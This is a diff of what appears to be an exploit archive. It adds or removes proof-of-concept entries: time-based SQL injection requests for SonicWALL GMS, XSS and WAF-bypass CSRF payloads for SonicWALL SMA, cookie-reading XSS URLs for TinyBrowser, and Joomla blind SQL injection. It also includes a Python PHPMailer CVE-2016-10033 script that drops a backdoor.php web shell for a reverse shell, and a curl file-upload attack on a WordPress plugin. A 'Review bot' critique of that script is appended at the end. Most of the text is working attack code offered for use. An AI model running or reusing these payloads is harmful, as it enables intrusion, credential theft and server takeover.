JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close + + +#3 + +GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&secondChangeOrderID=CHO14520472477130040102377D2&_dc=1453805798333&node=root HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +X-Requested-With: XMLHttpRequest +Accept: */* +Referer: http://127.0.0.1/sgms/viewdiff.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close + + +#4 + +GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2&secondChangeOrderID=CHO14520472477130040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&_dc=1453805798333&node=root HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +X-Requested-With: XMLHttpRequest +Accept: */* +Referer: http://127.0.0.1/sgms/viewdiff.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close diff --git a/platforms/hardware/webapps/40978.txt b/platforms/hardware/webapps/40978.txt new file mode 100755 index 000000000..e3bceff2f --- /dev/null +++ b/platforms/hardware/webapps/40978.txt 
@@ -0,0 +1,63 @@ +Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF + + +Vendor: Dell Inc. +Product web page: https://www.sonicwall.com/products/secure-mobile-access/ +Affected version: 8.1 (SSL-VPN) + +Summary: Keep up with the demands of today’s remote workforce. Enable secure +mobile access to critical apps and data without compromising security. Choose +from a variety of scalable secure mobile access (SMA) appliances and intuitive +Mobile Connect apps to fit every size business and budget. + +Desc: SonicWALL SMA suffers from a XSS issue due to a failure to properly sanitize +user-supplied input to several parameters. Attackers can exploit this weakness +to execute arbitrary HTML and script code in a user's browser session. The WAF was +bypassed via form-based CSRF. + +Tested on: SonicWALL SSL-VPN Web Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5392 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php + +Firmware fixed: 8.1.0.3 +Issue ID: 172692 +http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869 + + + +26.01.2016 + +-- + + +Reflected XSS via protocol parameter (GET): +------------------------------------------- + +https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:&bmId=55 + + +XSS via arbitrary parameter (GET): +---------------------------------- + +https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&=zsl + + +XSS via REMOTEPATH parameter (GET): +----------------------------------- + +https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/&bmId=59 + + +WAF Cross-Site Request Forgery PoC: +----------------------------------- + +POST /cgi-bin/editBookmark HTTP/1.1 +Host: 127.0.0.1 + 
+bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK diff --git a/platforms/php/webapps/38180.txt b/platforms/php/webapps/38180.txt deleted file mode 100755 index 2f8398bc9..000000000 --- a/platforms/php/webapps/38180.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/57230/info - -TinyBrowser is prone to multiple vulnerabilities. - -An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) \ No newline at end of file diff --git a/platforms/php/webapps/38181.txt b/platforms/php/webapps/38181.txt deleted file mode 100755 index 7c16bac0f..000000000 
--- a/platforms/php/webapps/38181.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/57230/info - -TinyBrowser is prone to multiple vulnerabilities. - -An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)// \ No newline at end of file diff --git a/platforms/php/webapps/40973.txt b/platforms/php/webapps/40973.txt new file mode 100755 index 000000000..b35373cd5 --- /dev/null +++ b/platforms/php/webapps/40973.txt @@ -0,0 +1,24 @@ +# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0 +# Date: 28-12-2016 +# Software Link: http://awebsupport.com/products/aweb-cartwatching-system +# Exploit Author: Javi Espejo(qemm) +# Contact: http://twitter.com/javiespejo +# Website: http://raipson.com +# CVE: REQUESTED +# Category: webapps + +1. Description + +Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave +This the code that has the parameters with the parameters not sanitized + +2. Proof of Concept + +option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries. + +3. Solution: + +Update to version 2.6.1 from the update center of joomla. +The Joomla vel publish the vulnerability on +Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 +http://awebsupport.com/ 
diff --git a/platforms/php/webapps/40974.py b/platforms/php/webapps/40974.py
new file mode 100755
index 000000000..9177ddc65
--- /dev/null
+++ b/platforms/php/webapps/40974.py
@@ -0,0 +1,65 @@ +""" +# Exploit Title: PHPMailer Exploit v1.0 +# Date: 29/12/2016 +# Exploit Author: Daniel aka anarc0der +# Version: PHPMailer < 5.2.18 +# Tested on: Arch Linux +# CVE : CVE 2016-10033 + +Description: +Exploiting PHPMail with back connection (reverse shell) from the target + +Usage: +1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033 +2 - Config your IP for reverse shell on payload variable +4 - Open nc listener in one terminal: $ nc -lnvp +3 - Open other terminal and run the exploit: python3 anarcoder.py + +Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU + +Full Advisory: +https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html +""" + +from requests_toolbelt import MultipartEncoder +import requests +import os +import base64 +from lxml import html as lh + +os.system('clear') +print("\n") +print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ") +print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗") +print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝") +print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗") +print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║") +print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝") +print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") +print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n") + +target = 'http://localhost:8080' +backdoor = '/backdoor.php' + +payload = '' +fields={'action': 'submit', + 'name': payload, + 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com', + 'message': 'Pwned'} + +m = MultipartEncoder(fields=fields, + boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') + +headers={'User-Agent': 'curl/7.47.0', + 'Content-Type': m.content_type} + +proxies = {'http': 
'localhost:8081', 'https':'localhost:8081'} + + +print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') +r = requests.post(target, data=m.to_string(), + headers=headers) +print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') +r = requests.get(target+backdoor, headers=headers) +if r.status_code == 200: + print('[+] ExPLoITeD ' + target) \ No newline at end of file diff --git a/platforms/php/webapps/40976.txt b/platforms/php/webapps/40976.txt new file mode 100755 index 000000000..d50d4f5c8 --- /dev/null +++ b/platforms/php/webapps/40976.txt @@ -0,0 +1,24 @@ +# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability +# Date: 30-12-2016 +# Software Link: Permium plugin +# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution +# Exploit Author: r3m1ck +# Website: https://www.r3m1ck.us/ +# Category: webapps +# Google Dork: inurl:"wp-content/plugins/Tevolution/" + +1. Description + +Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability. +Tevolution is not available for sale, it comes bundled with certain premium themes from templatic. + +2. Proof of Concept + +curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php + +3. Uploaded file location: + +Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name. +ex: +http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt +
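Review bot: `proxies` is built but never passed to `requests.post` or `requests.get`, so it is dead code and a reader would wrongly assume the requests go through the local proxy it names; either delete the assignment or pass `proxies=proxies` to both calls so the code matches its intent. `base64` and `lxml.html` (bound as `lh`) are imported and never used, and `requests_toolbelt` and `lxml` are third-party packages the header comment should list as requirements since a bare `python3` run fails on import otherwise. The module docstring's Usage steps are numbered 1, 2, 4, 3 and tell the reader to edit the `payload` variable, but the script leaves `payload = ''`, so the docstring and the code disagree and should be reconciled. The POST response is also never checked, so only the final GET distinguishes success from failure.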